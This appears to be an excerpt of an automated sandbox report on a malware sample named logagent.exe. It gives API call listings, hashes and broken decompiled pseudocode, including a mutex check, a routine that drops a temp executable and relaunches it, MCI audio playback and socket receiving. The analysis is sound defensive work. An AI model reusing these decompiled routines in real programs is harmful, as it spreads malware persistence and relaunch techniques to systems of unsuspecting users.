                                  0x0040aaa2
                                  0x0040aaac
                                  0x0040aab3
                                  0x0040aab8
                                  0x0040aabb
                                  0x0040aabd
                                  0x00000000
                                  0x00000000
                                  0x0040aabf
                                  0x0040aad2
                                  0x00000000
                                  0x0040aad2
                                  0x00000000
                                  0x0040aa30
                                  0x0040ab2a
                                  0x0040ab33
                                  0x0040ab3a
                                  0x0040ab4c
                                  0x0040ab54
                                  0x0040ab57
                                  0x0040abe2
                                  0x0040abe2
                                  0x0040abe9
                                  0x0040ac83
                                  0x0040ac83
                                  0x00000000
                                  0x0040ac83
                                  0x0040abf4
                                  0x0040abf9
                                  0x0040abff
                                  0x0040ac06
                                  0x0040ac0d
                                  0x0040ac14
                                  0x0040ac1a
                                  0x0040ac20
                                  0x0040ac26
                                  0x0040ac2b
                                  0x0040ac2b
                                  0x0040ac32
                                  0x0040ac3b
                                  0x0040ac44
                                  0x0040ac51
                                  0x0040ac62
                                  0x0040ac6e
                                  0x0040ac73
                                  0x0040ac76
                                  0x0040ac76
                                  0x00000000
                                  0x0040ab5d
                                  0x0040ab5d
                                  0x0040ab72
                                  0x0040ab76
                                  0x0040ab78
                                  0x0040ab81
                                  0x0040ab9e
                                  0x0040abaa
                                  0x0040abaf
                                  0x0040abb2
                                  0x0040abb4
                                  0x0040abc2
                                  0x0040abc2
                                  0x0040abd2
                                  0x0040abd5
                                  0x0040abd8
                                  0x00000000
                                  0x0040abda
                                  0x0040abdc
                                  0x00000000
                                  0x0040abdc
                                  0x0040abd8

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: e60b4f53b04ab762f7559d9111cd6afd6eea4163d5e6db4c9e15300d959ee8cd
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: e60b4f53b04ab762f7559d9111cd6afd6eea4163d5e6db4c9e15300d959ee8cd
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411D8A Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                  0x00411d8a
                                  0x00411d9b
                                  0x00411da9
                                  0x00411dae
                                  0x00411dbb
                                  0x00411dc0
                                  0x00411dc7
                                  0x00411dd0
                                  0x00411dd0
                                  0x00411dd9
                                  0x00411de4
                                  0x00411f46
                                  0x00411f55
                                  0x00000000
                                  0x00411f5b
                                  0x00411f69
                                  0x00411f79
                                  0x00411f79
                                  0x00411dea
                                  0x00411dea
                                  0x00411df9
                                  0x00411dff
                                  0x00411e04
                                  0x00411e07
                                  0x00411e24
                                  0x00411e2d
                                  0x00411e36
                                  0x00411e3a
                                  0x00411e43
                                  0x00411e47
                                  0x00411e50
                                  0x00411e54
                                  0x00411e5f
                                  0x00411e68
                                  0x00411e71
                                  0x00411e7a
                                  0x00411e86
                                  0x00411e8d
                                  0x00411ea1
                                  0x00411eb1
                                  0x00411ec1
                                  0x00411ecb
                                  0x00411ed3
                                  0x00411ed8
                                  0x00411ede
                                  0x00411ee4
                                  0x00411eee
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411efc
                                  0x00411f06
                                  0x00411f08
                                  0x00411f08
                                  0x00411f1a
                                  0x00411f1c
                                  0x00411f21
                                  0x00411f24
                                  0x00411f24
                                  0x00411f26
                                  0x00411f2a
                                  0x00000000
                                  0x00000000
                                  0x00411f2e
                                  0x00411f42
                                  0x00411f42
                                  0x00411f30
                                  0x00411f30
                                  0x00411f33
                                  0x00411f38
                                  0x00000000
                                  0x00411f3a
                                  0x00411f3b
                                  0x00411f3d
                                  0x00411f40
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411f40
                                  0x00411f38
                                  0x00000000
                                  0x00411f2e
                                  0x00411f83
                                  0x00411f85
                                  0x00411f88
                                  0x00411f8a
                                  0x00411f92
                                  0x00411f92
                                  0x00411fab
                                  0x00411fb3
                                  0x00411fb9
                                  0x00411fb9
                                  0x00411fbf
                                  0x00411ede
                                  0x00411fd3
                                  0x00411fdd
                                  0x00411fed
                                  0x00411ffd
                                  0x00412005
                                  0x00412005
                                  0x0041200e
                                  0x00412018

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403473 Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
